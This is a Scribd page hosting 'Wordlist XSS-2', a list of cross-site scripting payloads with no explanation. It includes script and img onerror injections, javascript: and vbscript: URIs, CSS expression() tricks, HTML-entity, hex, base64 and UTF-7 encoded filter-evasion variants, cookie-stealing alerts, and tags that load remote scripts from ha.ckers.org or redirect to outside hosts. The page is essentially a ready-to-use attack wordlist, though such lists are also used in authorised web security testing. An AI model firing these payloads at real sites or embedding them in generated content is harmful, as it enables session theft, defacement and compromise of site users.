Scribd Logo
Upload

Welcome to Scribd!

  • Wordlist XSS-2

    Uploaded by

    Jacob Pochin
    105 views3 pages
    The document contains multiple examples of cross-site scripting (XSS) attacks that could be used to inject malicious JavaScript code into web pages. Some examples include using HTML tags like <script> and <img> with JavaScript code to trigger alerts, using CSS expressions that contain JavaScript, and encoding JavaScript in various ways that could evade detection. The document serves as a reference of techniques that could enable XSS attacks.

    Original Description:

    Original Title

    wordlist XSS-2

    Copyright

    © © All Rights Reserved

    Available Formats

    TXT, PDF, TXT or read online from Scribd

    Did you find this document useful?

    Is this content inappropriate?

    Report this Document
    The document contains multiple examples of cross-site scripting (XSS) attacks that could be used to inject malicious JavaScript code into web pages. Some examples include using HTML tags like <script> and <img> with JavaScript code to trigger alerts, using CSS expressions that contain JavaScript, and encoding JavaScript in various ways that could evade detection. The document serves as a reference of techniques that could enable XSS attacks.

    Copyright:

    © All Rights Reserved
    Download as TXT, PDF, TXT or read online from Scribd
    Flag for inappropriate content
    Download as txt, pdf, or txt
    105 views3 pages

    Wordlist XSS-2

    Uploaded by

    Jacob Pochin
    The document contains multiple examples of cross-site scripting (XSS) attacks that could be used to inject malicious JavaScript code into web pages. Some examples include using HTML tags like <script> and <img> with JavaScript code to trigger alerts, using CSS expressions that contain JavaScript, and encoding JavaScript in various ways that could evade detection. The document serves as a reference of techniques that could enable XSS attacks.

    Copyright:

    © All Rights Reserved
    Download as TXT, PDF, TXT or read online from Scribd
    Flag for inappropriate content
    Download as txt, pdf, or txt
    of 3

    ')alert('xss');

    ");alert('xss');
    <h1>XSS DETECTED by HR</h1> .html
    <script>alert('XSS')</script>
    <sCRiPt>alert('XSS')</ScRIpT>
    <0x736372697074>alert('XSS')</0x736372697074>
    <char(115,99,114,105,112,116)>alert('XSS')</char(115,99,114,105,112,116)>
    <0x736372697074>alert(String.fromCharCode(88, 83, 83))</0x736372697074>
    <char(115,99,114,105,112,116)>alert(String.fromCharCode(88, 83,
    83))</char(115,99,114,105,112,116)>
    <script>alert(String.fromCharCode(88, 83, 83))</script>
    "><h1>XSS DETECTED by HR</h1> .html
    "><script>alert('XSS')</script>
    "><sCRiPt>alert('XSS')</ScRIpT>
    "><0x736372697074>alert('XSS')</0x736372697074>
    "><char(115,99,114,105,112,116)>alert('XSS')</char(115,99,114,105,112,116)>
    "><0x736372697074>alert(String.fromCharCode(88, 83, 83))</0x736372697074>
    "><char(115,99,114,105,112,116)>alert(String.fromCharCode(88, 83,
    83))</char(115,99,114,105,112,116)>
    "><script>alert(String.fromCharCode(88, 83, 83))</script>
    %22%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%27%58%53%53%27%29%3C%2F
    %73%63%72%69%70%74%3E
    &#x22;&#x3E;&#x3C;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3E;&#x61;&#x6C;&#x65;&#x72
    ;&#x74;&#x28;&#x27;&#x58;&#x53;&#x53;&#x27;&#x29;&#x3C;&#x2F;&#x73;&#x63;&#x72;&#x6
    9;&#x70;&#x74;&#x3E;
    &#34&#62&#60&#115&#99&#114&#105&#112&#116&#62&#97&#108&#101&#114&#116&#40&#39&#88&#
    83&#83&#39&#41&#60&#47&#115&#99&#114&#105&#112&#116&#62
    Ij48c2NyaXB0PmFsZXJ0KCdYU1MnKTwvc2NyaXB0Pg==
    <script>var myVar = XSS; alert(myVar)</script>
    ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88, 83, 83,
    32, 98, 121, 32, 72, 82))//";alert(String.fromCharCode(88, 83, 83, 32, 98, 121, 32,
    72, 82))//\";alert(String.fromCharCode(88, 83, 83, 32, 98, 121, 32, 72, 82))//--
    ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88, 83, 83, 32, 98, 121, 32, 72,
    82))</SCRIPT>
    <<SCRIPT>alert("XSS");//<</SCRIPT>
    <SCRIPT>a=/XSS/
    alert(a.source)</SCRIPT>
    \";alert('XSS');//
    <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
    <img src=x onerror=alert(XSS);>
    <IMG SRC="javascript:alert('XSS');">
    <IMG SRC=javascript:alert(&quot;XSS&quot;)>
    <IMG """><SCRIPT>alert("XSS")</SCRIPT>">
    <BODY BACKGROUND="javascript:alert('XSS')">
    <onmouseover="javascript:alert('XSS')">
    <INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
    <BODY ONLOAD=alert('XSS')>
    <IMG DYNSRC="javascript:alert('XSS')">
    <IMG SRC='vbscript:msgbox("XSS")'>
    <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
    <DIV STYLE="width: expression(alert('XSS'));">
    <IFRAME SRC="javascript:alert('XSS');"></IFRAME>
    <FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
    <BASE HREF="javascript:alert('XSS');//">
    <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
    <IMG
    SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;
    &#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>
    <IMG
    SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#00001
    12&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039
    &#0000088&#0000083&#0000083&#0000039&#0000041>
    <IMG
    SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x7
    4&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
    <DIV STYLE="background-image: url(javascript:alert('XSS'))">
    <DIV STYLE="background-
    image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\
    0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">
    <DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))">
    <DIV STYLE="width: expression(alert('XSS'));">
    <script>alert(document.cookie)</script>
    %3Cscript%3alert(document.cookie);%3C%2Fscript%3
    <script>document.location='http://google.com';</script>
    <script>document.location='http://google.com'; ',5000</script>
    <SCRIPT SRC=http://google.com></SCRIPT>
    <SCRIPT/XSS SRC="http://google.com"></SCRIPT>
    <body onLoad="document.location.href='http://google.com'">
    <meta http-equiv="accion" content="10"; url="http://google.com" />
    <frameset rows="100%"><frame noresize="noresize" frameborder ="0" title="XSS Found
    by HR" src="http://google.com"></frame></frameset>
    <script>window.open( "http://www.google.com/" )</script>
    <SCRIPT>alert('XSS');</SCRIPT>
    '';!--"<XSS>=&{()}
    <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
    <IMG SRC="javascript:alert('XSS');">
    <IMG SRC=javascript:alert('XSS')>
    <IMG SRC=JaVaScRiPt:alert('XSS')>
    <IMG SRC=javascript:alert(&quot;XSS&quot;)>
    <IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
    <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
    SRC=&#10<IMG
    6;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#
    116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>
    <IMG
    SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#00001
    12&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039
    &#0000088&#0000083&#0000083&#0000039&#0000041>
    <IMG
    SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x7
    4&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
    <IMG SRC="jav ascript:alert('XSS');">
    <IMG SRC="jav&#x09;ascript:alert('XSS');">
    <IMG SRC="jav&#x0A;ascript:alert('XSS');">
    <IMG SRC="jav&#x0D;ascript:alert('XSS');">
    <IMG SRC=" &#14; javascript:alert('XSS');">
    <SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
    <SCRIPT SRC=http://ha.ckers.org/xss.js?<B>
    <IMG SRC="javascript:alert('XSS')"
    <SCRIPT>a=/XSS/
    \";alert('XSS');//
    <INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
    <BODY BACKGROUND="javascript:alert('XSS')">
    <BODY ONLOAD=alert('XSS')>
    <IMG DYNSRC="javascript:alert('XSS')">
    <IMG LOWSRC="javascript:alert('XSS')">
    <BGSOUND SRC="javascript:alert('XSS');">
    <BR SIZE="&{alert('XSS')}">
    <LAYER SRC="http://ha.ckers.org/scriptlet.html"></LAYER>
    <LINK REL="stylesheet" HREF="javascript:alert('XSS');">
    <LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">
    <STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>
    <META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet">
    <STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>
    <IMG SRC='vbscript:msgbox("XSS")'>
    <IMG SRC="mocha:[code]">
    <IMG SRC="livescript:[code]">
    <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
    <META HTTP-EQUIV="refresh"
    CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
    <META HTTP-EQUIV="Link" Content="<javascript:alert('XSS')>; REL=stylesheet">
    <META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
    <IFRAME SRC="javascript:alert('XSS');"></IFRAME>
    <FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
    <TABLE BACKGROUND="javascript:alert('XSS')">
    <DIV STYLE="background-image: url(javascript:alert('XSS'))">
    <DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))">
    <DIV STYLE="width: expression(alert('XSS'));">
    <STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
    <IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
    <XSS STYLE="xss:expression(alert('XSS'))">
    exp/*<XSS STYLE='no\xss:noxss("*//*");
    <STYLE TYPE="text/javascript">alert('XSS');</STYLE>
    <STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A
    CLASS=XSS></A>
    <STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
    <BASE HREF="javascript:alert('XSS');//">
    <OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT>
    <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url
    value=javascript:alert('XSS')></OBJECT>
    getURL("javascript:alert('XSS')")
    a="get";
    <!--<value><![CDATA[<XML ID=I><X><C><![CDATA[<IMG SRC="javas<!
    [CDATA[cript:alert('XSS');">
    <XML SRC="http://ha.ckers.org/xsstest.xml" ID=I></XML>
    <HTML><BODY>
    <SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT>
    <!--#exec cmd="/bin/echo '<SCRIPT SRC'"--><!--#exec cmd="/bin/echo
    '=http://ha.ckers.org/xss.js></SCRIPT>'"-->
    <? echo('<SCR)';
    <META HTTP-EQUIV="Set-Cookie"
    Content="USERID=&lt;SCRIPT&gt;alert('XSS')&lt;/SCRIPT&gt;">
    <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7">
    </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
    <SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
    <SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>
    <SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
    <SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT>
    <SCRIPT>document.write("<SCRI");</SCRIPT>PT
    SRC="http://ha.ckers.org/xss.js"></SCRIPT>

    You might also like